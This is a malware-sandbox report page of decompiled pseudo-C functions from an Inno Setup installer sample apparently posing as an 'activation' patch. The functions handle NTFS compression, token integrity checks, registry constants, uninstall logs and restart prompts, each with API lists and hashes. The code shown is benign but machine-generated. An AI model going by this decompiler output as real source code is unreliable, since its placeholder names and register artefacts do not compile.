Function 00471E04 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00471E04(char __eax, void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v12;
				char _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t22;
				char _t34;

				_t33 = __edi;
				_t22 = __ecx;
				_t34 = __edx;
				_v5 = __eax;
				_t35 = __ecx;
				if(__ecx == 0) {
					_v16 = __edx;
					_v12 = 0xb;
					__eflags = 0;
					E004587AC("Unsetting NTFS compression on file: %s", __ecx, 0,  &_v16, __edi, __edx);
				} else {
					_v16 = __edx;
					_v12 = 0xb;
					E004587AC("Setting NTFS compression on file: %s", __ecx, 0,  &_v16, __edi, __edx);
				}
				_t16 = E004536DC(_v5, _t22, _t34, _t35);
				if(_t16 == 0) {
					_v16 = GetLastError();
					_v12 = 0;
					return E004587AC("Failed to set NTFS compression state (%d).", _t22, 0,  &_v16, _t33, _t34);
				}
				return _t16;
			}

0x00471e04
0x00471e0c
0x00471e0e
0x00471e10
0x00471e13
0x00471e15
0x00471e2f
0x00471e32
0x00471e39
0x00471e40
0x00471e17
0x00471e17
0x00471e1a
0x00471e28
0x00471e28
0x00471e4c
0x00471e53
0x00471e5a
0x00471e5d
0x00000000
0x00471e6b
0x00471e75

APIs

GetLastError.KERNEL32(?,00000000), ref: 00471E55

Strings

Unsetting NTFS compression on file: %s, xrefs: 00471E3B
Setting NTFS compression on file: %s, xrefs: 00471E23
Failed to set NTFS compression state (%d)., xrefs: 00471E66

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 8e8a0c5cdfe0ce8b7a8857350832ba381cbecebb6f103b99e3fa8de1305063f7
Instruction ID: f6184f432152a0a7fc1a05f21f829c234c5ebe7cab1ff57a01f48c4da343ccce
Opcode Fuzzy Hash: 8e8a0c5cdfe0ce8b7a8857350832ba381cbecebb6f103b99e3fa8de1305063f7
Instruction Fuzzy Hash: 6F01A230E0824866DB00DBED54412DDBBE58F4D344F54C1EFAC58E7392DF780A088B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0047EF84 Relevance: 6.0, APIs: 4, Instructions: 35
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0047EF84(intOrPtr __eax, void* __ecx, void* __edx, void* __eflags) {
				signed int _t3;
				long _t7;
				signed int _t11;
				void* _t16;
				void* _t17;
				intOrPtr* _t18;

				_t19 = __eflags;
				_push(__ecx);
				_t16 = __ecx;
				_t17 = __edx;
				 *_t18 = __eax;
				while(1) {
					_t3 = E004530E0( *_t18, _t17, _t19);
					asm("sbb ebx, ebx");
					_t11 =  ~( ~_t3);
					if(_t11 != 0 || GetLastError() == 2 || GetLastError() == 3) {
						break;
					}
					_t7 = GetTickCount();
					_t19 = _t7 - _t16 - 0x7d0;
					if(_t7 - _t16 < 0x7d0) {
						Sleep(0x32);
						continue;
					}
					break;
				}
				return _t11;
			}

0x0047ef84
0x0047ef87
0x0047ef88
0x0047ef8a
0x0047ef8c
0x0047ef8f
0x0047ef94
0x0047ef9d
0x0047ef9f
0x0047efa3
0x00000000
0x00000000
0x0047efb9
0x0047efc0
0x0047efc5
0x0047efc9
0x00000000
0x0047efc9
0x00000000
0x0047efc5
0x0047efd6

APIs

GetLastError.KERNEL32 ref: 0047EFA5
GetLastError.KERNEL32 ref: 0047EFAF
GetTickCount.KERNEL32 ref: 0047EFB9
Sleep.KERNEL32(00000032), ref: 0047EFC9

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 3a97ad30cdd890e38319d0d446ae931dd422a5845237926ba868b52b95081b14
Instruction ID: 0807e7f7cf1e805980a62751cbb38808fe0fbb755af5a0e062f1309e6a3556a9
Opcode Fuzzy Hash: 3a97ad30cdd890e38319d0d446ae931dd422a5845237926ba868b52b95081b14
Instruction Fuzzy Hash: 3BE02B3230910065C72075BF18966BF498ACE89368F148BBFF088E7686C81C8C05957E

Uniqueness

Uniqueness Score: -1.00%

Function 0047A378 Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047A378() {
				long _v8;
				void _v12;
				void* _v16;
				void* _t16;
				HANDLE* _t17;

				_t17 =  &_v12;
				_t16 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t17) != 0) {
					_v12 = 0;
					if(GetTokenInformation(_v16, 0x12,  &_v12, 4,  &_v8) != 0) {
						_t16 = _v16;
					}
					CloseHandle( *_t17);
				}
				return _t16;
			}

0x0047a379
0x0047a37c
0x0047a38e
0x0047a392
0x0047a3b0
0x0047a3b2
0x0047a3b2
0x0047a3ba
0x0047a3ba
0x0047a3c5

APIs

GetCurrentProcess.KERNEL32(00000008,?,00000001,00000000,00000002,00000000,0048361D,?,?,?,?,?,0049BB5F,00000000,0049BB87), ref: 0047A381
OpenProcessToken.ADVAPI32(00000000,00000008,?,00000001,00000000,00000002,00000000,0048361D,?,?,?,?,?,0049BB5F,00000000,0049BB87), ref: 0047A387
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,00000001,00000000,00000002,00000000,0048361D), ref: 0047A3A9
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,00000001,00000000,00000002,00000000,0048361D), ref: 0047A3BA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: ac4d9c8f746fed02195aeec2a75f74d8bec74019dc56b776fe9ec5c5957efb5f
Instruction ID: c90943684b1729c40737559502ac118c81e83100165bab7ebfc4b972d9605339
Opcode Fuzzy Hash: ac4d9c8f746fed02195aeec2a75f74d8bec74019dc56b776fe9ec5c5957efb5f
Instruction Fuzzy Hash: 94F037616443006BD600EAB58D81E5F73DCDB44354F04883A7E94C72C1E678DC18A776

Uniqueness

Uniqueness Score: -1.00%

Function 004246D0 Relevance: 6.0, APIs: 4, Instructions: 26
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004246D0(void* __eax) {
				struct HWND__* _t4;
				void* _t6;
				struct HWND__* _t7;

				_t6 = __eax;
				_t4 =  *(__eax + 0x20);
				if(_t4 != 0) {
					_t4 = GetLastActivePopup(_t4);
					_t7 = _t4;
					if(_t7 != 0 && _t7 !=  *((intOrPtr*)(_t6 + 0x20))) {
						_t4 = IsWindowVisible(_t7);
						if(_t4 != 0) {
							_t4 = IsWindowEnabled(_t7);
							if(_t4 != 0) {
								return SetForegroundWindow(_t7);
							}
						}
					}
				}
				return _t4;
			}

0x004246d2
0x004246d4
0x004246d9
0x004246dc
0x004246e1
0x004246e5
0x004246ed
0x004246f4
0x004246f7
0x004246fe
0x00000000
0x00424701
0x004246fe
0x004246f4
0x004246e5
0x00424708

APIs

GetLastActivePopup.USER32(?), ref: 004246DC
IsWindowVisible.USER32(?), ref: 004246ED
IsWindowEnabled.USER32(?), ref: 004246F7
SetForegroundWindow.USER32(?,?,?,?,?,00496048,00000000,00496885), ref: 00424701

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: be5d64faa6e157b5653d3523cc15ea2db8985bb2f0094ead62a70df3ff2b4bec
Instruction ID: 089861d4a48d175db2243411625799630e322bd2ba2e4807a6d4d74949adae11
Opcode Fuzzy Hash: be5d64faa6e157b5653d3523cc15ea2db8985bb2f0094ead62a70df3ff2b4bec
Instruction Fuzzy Hash: 1CE08691B03531129E31FAA518D1A9B018CEDC6B843461127FC26F7243DB1CCC0041BC

Uniqueness

Uniqueness Score: -1.00%

Function 0047C450 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210
registryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0047C450(char __eax, intOrPtr* __ebx, intOrPtr __edx, char __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v29;
				intOrPtr _v36;
				void* _v40;
				char _v44;
				char _t104;
				char _t164;
				char _t165;
				void* _t174;
				intOrPtr _t194;
				void* _t217;
				void* _t218;
				void* _t222;
				void* _t236;

				_t215 = __edi;
				_t173 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v44 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00403728(_v8);
				_push(_t222);
				_push(0x47c6ed);
				_push( *[fs:eax]);
				 *[fs:eax] = _t222 + 0xffffffd8;
				E004037B8( &_v8, 4, 1);
				_t217 = E0042DC70(0x5c, 4, _v8);
				if(_t217 == 0) {
					L24:
					E00453B40("Failed to parse \"reg\" constant", _t173, _t215, _t217, _t236);
					L25:
					_pop(_t194);
					 *[fs:eax] = _t194;
					_push(E0047C6F4);
					E00403400( &_v44);
					E00403420( &_v28, 4);
					return E00403400( &_v8);
				}
				E00403778(_v8, _t217 - 1, 1,  &_v16);
				if(_v16 == 0) {
					goto L24;
				} else {
					_t104 =  *0x49cc94; // 0x2
					_v29 = _t104;
					_t174 = E00403574(_v16);
					if(_t174 >= 2) {
						if( *((char*)(_v16 + _t174 - 2)) != 0x33 ||  *((char*)(_v16 + _t174 - 1)) != 0x32) {
							_t164 = _v16;
							__eflags =  *((char*)(_t164 + _t174 - 2)) - 0x36;
							if( *((char*)(_t164 + _t174 - 2)) == 0x36) {
								_t165 = _v16;
								__eflags =  *((char*)(_t165 + _t174 - 1)) - 0x34;
								if( *((char*)(_t165 + _t174 - 1)) == 0x34) {
									__eflags =  *0x49f446;
									if(__eflags == 0) {
										E00453B40("Cannot access a 64-bit key in a \"reg\" constant on this version of Windows", _t174, _t215, _t217, __eflags);
									}
									_v29 = 2;
									__eflags = _t174 - 2;
									E004038A4( &_v16, _t174 - 2);
								}
							}
						} else {
							_v29 = 1;
							E004038A4( &_v16, _t174 - 2);
						}
					}
					_v36 = 0;
					_t215 = 5;
					_t173 = 0x49cca4;
					while(E00406F54( *_t173, _v16) != 0) {
						_t173 = _t173 + 8;
						_t215 = _t215 - 1;
						__eflags = _t215;
						if(__eflags != 0) {
							continue;
						}
						L15:
						if(_v36 == 0) {
							goto L24;
						}
						_t38 = _t217 + 1; // 0x1
						E00403778(_v8, 0x7fffffff, _t38,  &_v16);
						_t218 = E0042DC70(0x7c, 0x7fffffff, _v16);
						if(_t218 == 0) {
							_t218 = E00403574(_v16) + 1;
						}
						_t43 = _t218 + 1; // 0x2
						E00403778(_v16, 0x7fffffff, _t43,  &_v28);
						E004038A4( &_v16, _t218 - 1);
						_t217 = E0042DC70(0x2c, 0x7fffffff, _v16);
						if(_t217 == 0) {
							goto L24;
						} else {
							E00403778(_v16, _t217 - 1, 1,  &_v20);
							_t50 = _t217 + 1; // 0x1
							E00403778(_v16, 0x7fffffff, _t50,  &_v24);
							E0042DB6C( &_v20, _t173, _t215, _t217);
							_t236 = 0x2c;
							if(0x2c == 0) {
								goto L24;
							}
							E0042DB6C( &_v24, _t173, _t215, _t217);
							_t236 = 0x2c;
							if(0x2c == 0 || E0042DB6C( &_v28, _t173, _t215, _t217) == 0) {
								goto L24;
							} else {
								E0047E4CC(_v28,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _v12);
								E0047E4CC(_v20,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)),  &_v44);
								if(E0042E2AC(_v29, E00403738(_v44), _v36,  &_v40, 1, 0) == 0) {
									E0047E4CC(_v24,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)),  &_v44);
									E00403738(_v44);
									E0042E1DC();
									RegCloseKey(_v40);
								}
								goto L25;
							}
						}
					}
					_t34 = _t173 + 4; // 0x80000000
					_v36 =  *_t34;
					goto L15;
				}
			}

0x0047c450
0x0047c450
0x0047c456
0x0047c457
0x0047c458
0x0047c45b
0x0047c45e
0x0047c461
0x0047c464
0x0047c467
0x0047c46a
0x0047c46d
0x0047c473
0x0047c47a
0x0047c47b
0x0047c480
0x0047c483
0x0047c493
0x0047c4a2
0x0047c4a6
0x0047c6b8
0x0047c6bd
0x0047c6c2
0x0047c6c4
0x0047c6c7
0x0047c6ca
0x0047c6d2
0x0047c6df
0x0047c6ec
0x0047c6ec
0x0047c4bb
0x0047c4c4
0x00000000
0x0047c4ca
0x0047c4ca
0x0047c4cf
0x0047c4da
0x0047c4df
0x0047c4e9
0x0047c508
0x0047c50b
0x0047c510
0x0047c512
0x0047c515
0x0047c51a
0x0047c51c
0x0047c523
0x0047c52a
0x0047c52a
0x0047c52f
0x0047c535
0x0047c53b
0x0047c53b
0x0047c51a
0x0047c4f5
0x0047c4f5
0x0047c501
0x0047c501
0x0047c4e9
0x0047c542
0x0047c545
0x0047c54a
0x0047c54f
0x0047c565
0x0047c568
0x0047c568
0x0047c569
0x00000000
0x00000000
0x0047c56b
0x0047c56f
0x00000000
0x00000000
0x0047c579
0x0047c584
0x0047c593
0x0047c597
0x0047c5a3
0x0047c5a3
0x0047c5a8
0x0047c5b3
0x0047c5be
0x0047c5cd
0x0047c5d1
0x00000000
0x0047c5d7
0x0047c5e6
0x0047c5ef
0x0047c5fa
0x0047c602
0x0047c607
0x0047c609
0x00000000
0x00000000
0x0047c612
0x0047c617
0x0047c619
0x00000000
0x0047c62f
0x0047c642
0x0047c662
0x0047c67e
0x0047c693
0x0047c69b
0x0047c6a8
0x0047c6b1
0x0047c6b1
0x00000000
0x0047c67e
0x0047c619
0x0047c5d1
0x0047c55d
0x0047c560
0x00000000
0x0047c560

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047DD3D,?,00000000,00000000,00000001,00000000,0047C6ED,?,00000000), ref: 0047C6B1

Strings

Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047C525
Failed to parse "reg" constant, xrefs: 0047C6B8

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: be73ed550b73c9f20417e78dc73e822ec0b2bde051a3891d29eeba9427ee46df
Instruction ID: 4f1aaac30373af7a786909edf03acd4fac9d6a039f8d9495eedf865a7040ef78
Opcode Fuzzy Hash: be73ed550b73c9f20417e78dc73e822ec0b2bde051a3891d29eeba9427ee46df
Instruction Fuzzy Hash: FE813274E00118AFCB11EF95D481ADEBBF9AF48354F60816AE414B7391D738AE45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045CAF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0045CAF4(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v4104;
				intOrPtr* _v4108;
				signed int _v4109;
				intOrPtr _v4114;
				intOrPtr _v4118;
				char _v4120;
				intOrPtr _v4124;
				signed int _v4236;
				intOrPtr _v4240;
				intOrPtr _v4244;
				intOrPtr _v4248;
				char _v4376;
				char _v4504;
				void _v4568;
				intOrPtr _v4572;
				intOrPtr _v4576;
				intOrPtr _t92;
				intOrPtr _t117;
				signed char _t128;
				intOrPtr _t129;
				intOrPtr _t160;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t180;

				_t177 = _t178;
				_push(__eax);
				_t180 = _t178 + 0xffffffffffffee28;
				_v4109 = __ecx;
				_t168 = __edx;
				_t173 = __eax;
				_v4104 = 0;
				_t128 = _v4109 ^ 0x00000001;
				if(_t128 == 0) {
					_v4108 = E00450F04(1, 0, 2, 2);
				} else {
					_v4108 = E00450F04(1, 0, 2, 0);
				}
				_push(_t177);
				_push(0x45cd5d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t180;
				if(_t128 == 0) {
					_t134 = 0x1c0;
					E00450EA0(_v4108, 0x1c0,  &_v4568);
					E00450EC8(_v4108, _v4240);
					E00451104(_v4108);
				} else {
					E00402934( &_v4568, 0x1c0);
					_t134 = 0x1c0;
					 *((intOrPtr*)( *_v4108 + 0x10))();
				}
				_t129 =  *((intOrPtr*)(_t173 + 4));
				while(_t129 != 0) {
					_v4120 =  *((intOrPtr*)(_t129 + 0x10));
					_v4118 =  *((intOrPtr*)(_t129 + 8));
					_v4114 =  *((intOrPtr*)(_t129 + 0xc));
					E0045CA7C( &_v4120, 0xa, _t177);
					E0045CA7C(_t129 + 0x12,  *((intOrPtr*)(_t129 + 0xc)), _t177);
					_pop(_t134);
					_t117 = _v4244;
					if(_t117 < 0) {
						L9:
						E00453B40("NumRecs range exceeded", _t129, _t168, _t173, _t186);
					} else {
						_t186 = _t117 - 0x7fffffff;
						if(_t117 >= 0x7fffffff) {
							goto L9;
						}
					}
					_v4244 = _v4244 + 1;
					_t129 =  *((intOrPtr*)(_t129 + 4));
				}
				E0045C9F8(_t134, _t177);
				 *((intOrPtr*)( *_v4108))();
				_t188 = _v4572;
				if(_v4572 != 0) {
					E00453B40("EndOffset range exceeded", _t129, _t168, _t173, _t188);
				}
				 *((intOrPtr*)( *_v4108))();
				_v4240 = _v4576;
				E00450EC8(_v4108, 0);
				memcpy( &_v4568, 0x5d6dd68 + "Inno Setup Uninstall Log (b)", 0x10 << 2);
				_t175 = _t173;
				E0045C9A4( *((intOrPtr*)(_t175 + 0x14)),  &_v4504, 0x80);
				if((_v4109 ^ 0x00000001 | _a4) != 0) {
					E0045C9A4( *((intOrPtr*)(_t175 + 0x18)),  &_v4376, 0x80);
				}
				_t92 =  *((intOrPtr*)(_t175 + 0x20));
				if(_t92 > _v4248) {
					_v4248 = _t92;
				}
				_v4236 = _v4236 |  *(_t175 + 0x1d);
				_v4124 = E00451660( &_v4568, 0x1bc);
				FlushFileBuffers( *(_v4108 + 4));
				 *((intOrPtr*)( *_v4108 + 0x10))();
				_pop(_t160);
				 *[fs:eax] = _t160;
				_push(0x45cd64);
				return E00402B58(_v4108);
			}

0x0045caf5
0x0045cafd
0x0045cafe
0x0045cb07
0x0045cb0d
0x0045cb0f
0x0045cb13
0x0045cb1f
0x0045cb24
0x0045cb56
0x0045cb26
0x0045cb3a
0x0045cb3a
0x0045cb5e
0x0045cb5f
0x0045cb64
0x0045cb67
0x0045cb74
0x0045cba6
0x0045cbb1
0x0045cbc2
0x0045cbcd
0x0045cb76
0x0045cb83
0x0045cb8e
0x0045cb9b
0x0045cb9b
0x0045cbd2
0x0045cbd7
0x0045cbdd
0x0045cbe7
0x0045cbf0
0x0045cc02
0x0045cc0f
0x0045cc14
0x0045cc15
0x0045cc1d
0x0045cc26
0x0045cc2b
0x0045cc1f
0x0045cc1f
0x0045cc24
0x00000000
0x00000000
0x0045cc24
0x0045cc30
0x0045cc36
0x0045cc39
0x0045cc3e
0x0045cc52
0x0045cc54
0x0045cc5b
0x0045cc62
0x0045cc62
0x0045cc75
0x0045cc7d
0x0045cc8b
0x0045ccab
0x0045ccad
0x0045ccbe
0x0045ccce
0x0045cce0
0x0045cce0
0x0045cce5
0x0045ccee
0x0045ccf0
0x0045ccf0
0x0045cd07
0x0045cd19
0x0045cd29
0x0045cd41
0x0045cd46
0x0045cd49
0x0045cd4c
0x0045cd5c

APIs

Part of subcall function 00451104: SetEndOfFile.KERNEL32(?,?,0045CBD2,00000000,0045CD5D,?,00000000,00000002,00000002), ref: 0045110B

FlushFileBuffers.KERNEL32(?), ref: 0045CD29

Strings

NumRecs range exceeded, xrefs: 0045CC26
EndOffset range exceeded, xrefs: 0045CC5D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: 8a60829238e8327625838b31da6bb3730b687f0662bb86e297ec8376119d1d8b
Instruction ID: 31f4abf116af19d9e5b678acab2297332ff925687264b8022cc2431fdfe05cd7
Opcode Fuzzy Hash: 8a60829238e8327625838b31da6bb3730b687f0662bb86e297ec8376119d1d8b
Instruction Fuzzy Hash: 95617234A002948FDB25DF25C891BDAB7B5AF49305F0084DAED899B352D674AEC8CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0048594C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0048594C(intOrPtr __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _t18;
				void* _t19;
				intOrPtr _t23;
				char _t24;
				intOrPtr _t25;
				intOrPtr _t37;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr _t51;
				char _t55;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t56 = __ecx;
				_t75 = _t76;
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t55 = __edx;
				_v8 = __eax;
				_push(_t75);
				_push(0x485b17);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_push(_t75);
				_push(0x485ad6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t18 =  *0x49f0ac; // 0x31f4d88
				_t19 = E00418670(_t18);
				_t73 = _t19;
				if(_t19 == GetForegroundWindow()) {
					_t51 =  *0x49e62c; // 0x2252410
					SetActiveWindow( *(_t51 + 0x20));
				}
				E0042328C();
				if(_t55 != 0 ||  *0x49f44c != 0) {
					__eflags = _t55;
					if(_t55 == 0) {
						__eflags =  *0x49f144;
						if( *0x49f144 != 0) {
							_t49 =  *0x49f144; // 0x0
							 *0x49f488 = _t49;
						}
					} else {
						 *0x49f488 = 8;
					}
					__eflags =  *0x49f127;
					if( *0x49f127 == 0) {
						_t23 =  *0x49f443; // 0x0
						_t24 = _t23 - 1;
						__eflags = _t24;
						if(__eflags < 0) {
							__eflags = _t55;
							if(_t55 == 0) {
								_t25 =  *0x49f0ac; // 0x31f4d88
								 *0x49f44d =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 0x25c)) + 0x101));
							} else {
								_t37 =  *0x49f0ac; // 0x31f4d88
								 *0x49f44d =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x2f0)) + 0x101));
							}
						} else {
							if(__eflags == 0) {
								__eflags = _t55;
								if(_t55 == 0) {
									E00467C8C(0x59,  &_v12);
								} else {
									_t44 =  *0x49f0ac; // 0x31f4d88
									_push( *((intOrPtr*)(_t44 + 0x348)));
									_push(0x485b30);
									_push(0x485b30);
									_push(0x485b30);
									E00467C8C(0x59,  &_v16);
									_push(_v16);
									E00403634();
								}
								_t56 = 1;
								_t43 = E00481214(_v12, _t55, 1, 0, _t71, _t73, 6, 1, 4);
								__eflags = _t43 - 6;
								 *0x49f44d = _t43 == 6;
							} else {
								__eflags = _t24 == 1;
								if(_t24 == 1) {
									 *0x49f44d = 1;
								}
							}
						}
					} else {
						 *0x49f44d = 0;
					}
					__eflags =  *0x49f44d;
					if( *0x49f44d == 0) {
						E004585A0("Will not restart Windows automatically.", _t55, _t56, _t71, _t73);
					}
				} else {
					E00485848(_t55, _t56, _t71, _t73);
				}
				E00484874(_v8, 1, 3);
				_pop(_t64);
				 *[fs:eax] = _t64;
				E00484004();
				_pop(_t65);
				 *[fs:eax] = _t65;
				_push(0x485b1e);
				return E00403420( &_v16, 2);
			}

0x0048594c
0x0048594c
0x0048594d
0x0048594f
0x00485951
0x00485953
0x00485955
0x00485956
0x00485957
0x00485958
0x0048595a
0x0048595f
0x00485960
0x00485965
0x00485968
0x0048596d
0x0048596e
0x00485973
0x00485976
0x00485979
0x0048597e
0x00485983
0x0048598c
0x0048598e
0x00485997
0x00485997
0x004859a1
0x004859a8
0x004859bd
0x004859bf
0x004859cd
0x004859d4
0x004859d6
0x004859db
0x004859db
0x004859c1
0x004859c1
0x004859c1
0x004859e0
0x004859e7
0x004859f5
0x004859fa
0x004859fa
0x004859fc
0x00485a0d
0x00485a0f
0x00485a2c
0x00485a3d
0x00485a11
0x00485a11
0x00485a22
0x00485a22
0x004859fe
0x004859fe
0x00485a44
0x00485a46
0x00485a83
0x00485a48
0x00485a48
0x00485a4d
0x00485a53
0x00485a58
0x00485a5d
0x00485a67
0x00485a6c
0x00485a77
0x00485a77
0x00485a8e
0x00485a95
0x00485a9a
0x00485a9d
0x00485a00
0x00485a00
0x00485a02
0x00485aa6
0x00485aa6
0x00485a02
0x004859fe
0x004859e9
0x004859e9
0x004859e9
0x00485aad
0x00485ab4
0x00485abb
0x00485abb
0x004859b3
0x004859b3
0x004859b3
0x00485ac7
0x00485ace
0x00485ad1
0x00485af7
0x00485afe
0x00485b01
0x00485b04
0x00485b16

APIs

GetForegroundWindow.USER32(00000000,00485AD6,?,00000000,00485B17,?,?,?,?,00000000,00000000,00000000,?,0046D345), ref: 00485985
